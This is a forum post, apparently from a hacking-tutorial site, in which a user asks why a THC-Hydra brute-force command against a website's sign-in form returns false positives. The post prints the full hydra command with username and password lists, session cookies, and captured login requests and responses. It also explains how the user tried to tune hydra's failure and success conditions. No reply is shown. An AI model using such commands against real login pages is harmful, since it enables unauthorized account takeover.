Problems with THC-HYDRA Giving False Positive PasswordS

Sep 18, 2018 03:29 AM

hydra -L userdummy.txt -P passdummy.txt -vV 104.20.113.15 https-post-form "/website.com/sign-in:email=^USER^&password=^PASS^&login=Log+in+to+your+account:F=incorrect.:C= _cfduid=de9ff7a7ca4bc2968430ae81bf36e057e1536632635; PHPSESSID=vj8g88oje7k5u0nk9t9cvavlv2; gaTrackGEO=x; SERVERID=fe03; httpreferer=%2Fsign-in; ga=GA1.2.1543913319.1536632638; gid=GA1.2.1875996076.1536632638; gat=1"

This is my full command using the cookie from the request listed below.

POST /sign-in HTTP/1.1

Host: website.com

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: website.com/sign-in

Cookie: _cfduid=de9ff7a7ca4bc2968430ae81bf36e057e1536632635; PHPSESSID=vj8g88oje7k5u0nk9t9cvavlv2; gaTrackGEO=x; SERVERID=fe03; httpreferer=%2Fsign-in; ga=GA1.2.1543913319.1536632638; gid=GA1.2.1875996076.1536632638; gat=1

Connection: close

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

Content-Length: 61

email=username&password=password&login=Log+in+to+your+account

This request is a recording of the request form using an invalid username and password. When i use a correct password and username the only thing that has changed has been the end of the cookie "gat=1". It is not there when using a valid and username. I have tried using the cookie from a successful login and changed the "F=" to a "S=" in my hydra call command. The result is as following: "1 of 1 target completed, 0 valid passwords found". And i get "1 of 1 target successfully completed, 24 valid passwords found" as if hydra is not seeing the failure message "email or password are incorect" or the failed request cookie "_cfduid=de9ff7a7ca4bc2968430ae81bf36e057e1536632635; PHPSESSID=vj8g88oje7k5u0nk9t9cvavlv2; gaTrackGEO=x; SERVERID=fe03; httpreferer=%2Fsign-in; ga=GA1.2.1543913319.1536632638; gid=GA1.2.1875996076.1536632638; _gat=1".

For your information the hydra commmand breaks down like this. hydra (calling hydra) -L (use this username list) userlist.txt. -P (use this pass list) passlist.txt -vV (verbose) 127.0.0.0 (host ip) https-get-form (method) "x:xxx:xxx (host url:email/pass parameters/failure message or success message/optional parameter/optional parameter(cookie or header)".

I have tried several variants, including using the header "200 OK" as the optional parameter, in combination and without combination with the cookie. Ive tried not using either, there must be something wrong with the failure parameter, I think hydra is struggling to differentiate a valid login from a failed. Therefore either giving me all valid passwords or all failed.This is a copy of the request form using a valid login and valid password. As you can see gat_1 has disapeared from the cookie and should work to help hydra differentiate from a valid and a failed request.

POST /sign-in HTTP/1.1

Host: website.com

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: website.com/sign-in

Cookie: _cfduid=de9ff7a7ca4bc2968430ae81bf36e057e1536632635; PHPSESSID=vj8g88oje7k5u0nk9t9cvavlv2; gaTrackGEO=x; SERVERID=fe03; httpreferer=%2Fsign-in; ga=GA1.2.1543913319.1536632638; _gid=GA1.2.1875996076.1536632638

Connection: close

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

Content-Length: 59

email=iforgot&password=iforgot&login=Log+in+to+your+account

This is the response to that valid request: HTTP/1.1 302 Moved Temporarily

Date: Tue, 11 Sep 2018 02:46:33 GMT

Content-Type: text/html; charset=utf-8

Connection: close

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Set-Cookie: http_referer=%2Fsign-in; expires=Tue, 11-Sep-2018 03:46:33 GMT; path=/; domain=.website.com

Set-Cookie: loginkey=0067aa09e8bc1b2d92dece7acee917cc; expires=Tue, 18-Sep-2018 02:46:33 GMT; path=/; domain=.website.com

Location: /

Vary: Accept-Encoding

Expect-CT: max-age=604800, report-uri="report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"

Server: cloudflare

CF-RAY: 4586cdfa5b308d1d-PDX

Content-Length: 0uest.

I have tried using the loginkey as the cookie for the success message. Doesn't work.

Connection: close

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Set-Cookie: http_referer=%2Fsign-in; expires=Tue, 11-Sep-2018 03:24:37 GMT; path=/; domain=.website.com

Set-Cookie: return_url=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT

Vary: Accept-Encoding

Expect-CT: max-age=604800, report-uri="report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"

Server: cloudflare

CF-RAY: 4586add9adba8d23-PDX

Content-Length: 9156

This is the response to a request using a invalid password and username. I have tried using the return_url cookie as the failure parameter but it doesn't work either.

I started combing through the source code for hydra to try to find an answer to my problem. I learned that if you escape your colons, then hydra will not count it as a separate parameter (ex: Cookie//:) tried with no success. I also learned that "Set-Cookie" is in the source code for hydra and therefore should be able to read Set-Cookie: XXXX as a valid parameter. I understand that on websites like this no one will do the work for you. As im not looking only for a straightforward answer, but more guidance to find the answer to my problem. Thank you al

Related Articles

637263493835297420.jpg

How to Use Zero-Width Characters to Hide Secret Messages in Text (& Even Reveal Leaks)

636455706472146367.jpg

How to Hide DDE-Based Attacks in MS Word

Comments

No Comments Exist

Be the first, drop a comment!